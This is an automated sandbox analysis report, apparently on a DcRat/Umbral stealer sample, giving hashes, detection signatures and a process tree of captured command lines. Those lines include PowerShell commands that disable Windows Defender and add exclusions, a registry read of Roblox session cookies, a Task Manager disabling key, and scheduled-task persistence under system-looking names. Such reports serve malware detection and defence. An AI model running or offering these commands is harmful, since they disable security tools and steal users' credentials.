Analysis

max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-05-2024 19:11

Static task: static1
Behavioral task: behavioral1
Sample: 898A94F29EDC228CE3BD2054F3D5D6DD.exe
Resource: win7-20240221-en

General

Target: 898A94F29EDC228CE3BD2054F3D5D6DD.exe
Size: 4.3MB
MD5: 898a94f29edc228ce3bd2054f3d5d6dd
SHA1: f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5
SHA256: a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37
SHA512: 8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae
SSDEEP: 49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ
Signatures

DcRat
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
resource                                                                      yara_rule
behavioral2/memory/3196-0-0x0000000000400000-0x000000000084E000-memory.dmp    dcrat
behavioral2/files/0x0009000000023434-65.dat                                   dcrat
behavioral2/files/0x0007000000023438-219.dat                                  dcrat
behavioral2/memory/1548-220-0x0000000000290000-0x00000000004DA000-memory.dmp  dcrat

Detect Umbral payload (3 IoCs)
resource                                                                      yara_rule
behavioral2/memory/3196-0-0x0000000000400000-0x000000000084E000-memory.dmp    family_umbral
behavioral2/files/0x00090000000226f2-5.dat                                    family_umbral
behavioral2/memory/1956-83-0x0000025EB33F0000-0x0000025EB3430000-memory.dmp   family_umbral

Process spawned unexpected child process (21 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description                                                                          pid   pid_target  Process       procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   3772  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   3740  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   3964  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   2780  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   2700  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   4016  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   4144  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   436   2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   4208  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   1580  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   3212  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   1004  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   1676  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   2584  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   4996  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   4752  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   2168  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   4416  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   4744  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   2588  2768        schtasks.exe  91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process   3616  2768        schtasks.exe  91

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid   Process
2700  powershell.exe

Disables Task Manager via registry modification

Drops file in Drivers directory (1 IoCs)
description                   ioc                                    Process
File opened for modification  C:\Windows\System32\drivers\etc\hosts  stealer.exe

Checks computer location settings (2 TTPs, 5 IoCs)
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                                    Process
Key value queried  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation   driverBrokercommon.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation   spoolsv.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation   898A94F29EDC228CE3BD2054F3D5D6DD.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation   чекер dc.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation   WScript.exe

Executes dropped EXE (5 IoCs)
pid   Process
1956  stealer.exe
4664  чекер dc.exe
4132  Inject.exe
1548  driverBrokercommon.exe
2020  spoolsv.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow  ioc
19    discord.com
20    discord.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
3     ip-api.com

Drops file in Program Files directory (6 IoCs)
description   ioc                                                                             Process
File created  C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe                driverBrokercommon.exe
File created  C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\22eafd247d37c3                   driverBrokercommon.exe
File created  C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe                         driverBrokercommon.exe
File created  C:\Program Files (x86)\Windows Photo Viewer\f3b6ecef712a24                      driverBrokercommon.exe
File created  C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe       driverBrokercommon.exe
File created  C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\6203df4a6bafc7  driverBrokercommon.exe

Drops file in Windows directory (4 IoCs)
description   ioc                                                      Process
File created  C:\Windows\bcastdvr\WmiPrvSE.exe                         driverBrokercommon.exe
File created  C:\Windows\bcastdvr\24dbde2999530e                       driverBrokercommon.exe
File created  C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe   driverBrokercommon.exe
File created  C:\Windows\RemotePackages\RemoteApps\9e8d7a4ca61bd9      driverBrokercommon.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 21 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
2780  schtasks.exe
4144  schtasks.exe
436   schtasks.exe
4996  schtasks.exe
2168  schtasks.exe
3616  schtasks.exe
3772  schtasks.exe
3964  schtasks.exe
2700  schtasks.exe
1004  schtasks.exe
2584  schtasks.exe
4416  schtasks.exe
2588  schtasks.exe
3740  schtasks.exe
1580  schtasks.exe
1676  schtasks.exe
4016  schtasks.exe
3212  schtasks.exe
4752  schtasks.exe
4744  schtasks.exe
4208  schtasks.exe

Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine videocard installed.
pid   Process
3744  wmic.exe

Modifies registry class (4 IoCs)
description  ioc                                                                                                  Process
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\  898A94F29EDC228CE3BD2054F3D5D6DD.exe
Key created  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings                    чекер dc.exe
Key created  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings                    driverBrokercommon.exe
Key created  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings                    spoolsv.exe

Modifies registry key (1 TTPs, 1 IoCs)
pid   Process
4344  reg.exe

Runs ping.exe (1 TTPs, 1 IoCs)
pid   Process
2632  PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid   Process
2020  spoolsv.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)

Suspicious use of WriteProcessMemory (54 IoCs)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTPs, 1 IoCs)
pid   Process
4408  attrib.exe
Processes

Each entry gives the image path, the command line as captured, the signatures that fired on the process, and its PID. The bracketed number is the depth in the process tree.

[1] C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID: 3196

    [2] C:\Users\Admin\AppData\Local\Temp\stealer.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 1956

        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic.exe" csproduct get uuid
            - Suspicious use of AdjustPrivilegeToken
            PID: 4712

        [3] C:\Windows\SYSTEM32\attrib.exe
            Command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
            - Views/modifies file attributes
            PID: 4408

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2700

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2216

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 3084

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1492

        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic.exe" os get Caption
            - Suspicious use of AdjustPrivilegeToken
            PID: 3836

        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic.exe" computersystem get totalphysicalmemory
            PID: 2968

        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic.exe" csproduct get uuid
            PID: 3564

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            - Suspicious behavior: EnumeratesProcesses
            PID: 4000

        [3] C:\Windows\System32\Wbem\wmic.exe
            Command line: "wmic" path win32_VideoController get name
            - Detects videocard installed
            PID: 3744

        [3] C:\Windows\SYSTEM32\cmd.exe
            Command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
            - Suspicious use of WriteProcessMemory
            PID: 916

            [4] C:\Windows\system32\PING.EXE
                Command line: ping localhost
                - Runs ping.exe
                PID: 2632

    [2] C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Modifies registry class
        - Suspicious use of WriteProcessMemory
        PID: 4664

        [3] C:\Windows\SysWOW64\WScript.exe
            Command line: "C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory
            PID: 3320

            [4] C:\Windows\SysWOW64\cmd.exe
                Command line: C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
                - Suspicious use of WriteProcessMemory
                PID: 548

                [5] C:\MsWinsessiondllNet\driverBrokercommon.exe
                    Command line: "C:\MsWinsessiondllNet\driverBrokercommon.exe"
                    - Checks computer location settings
                    - Executes dropped EXE
                    - Drops file in Program Files directory
                    - Drops file in Windows directory
                    - Modifies registry class
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of WriteProcessMemory
                    PID: 1548

                    [6] C:\Windows\System32\cmd.exe
                        Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat"
                        - Suspicious use of WriteProcessMemory
                        PID: 4556

                        [7] C:\Windows\system32\w32tm.exe
                            Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            PID: 740

                        [7] C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe
                            Command line: "C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe"
                            - Checks computer location settings
                            - Executes dropped EXE
                            - Modifies registry class
                            - Suspicious behavior: EnumeratesProcesses
                            - Suspicious behavior: GetForegroundWindowSpam
                            - Suspicious use of WriteProcessMemory
                            PID: 2020

                            [8] C:\Windows\System32\WScript.exe
                                Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs"
                                PID: 2996

                            [8] C:\Windows\System32\WScript.exe
                                Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs"
                                PID: 4048

                [5] C:\Windows\SysWOW64\reg.exe
                    Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    - Modifies registry key
                    PID: 4344

    [2] C:\Users\Admin\AppData\Local\Temp\Inject.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\Inject.exe"
        - Executes dropped EXE
        PID: 4132

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 3772

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 3740

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 3964

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2780

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2700

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 4016

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 4144

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 436

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 4208

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 1580

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 3212

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 1004

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 1676

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2584

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 4996

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 4752

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2168

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 4416

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 4744

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2588

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 3616
Downloads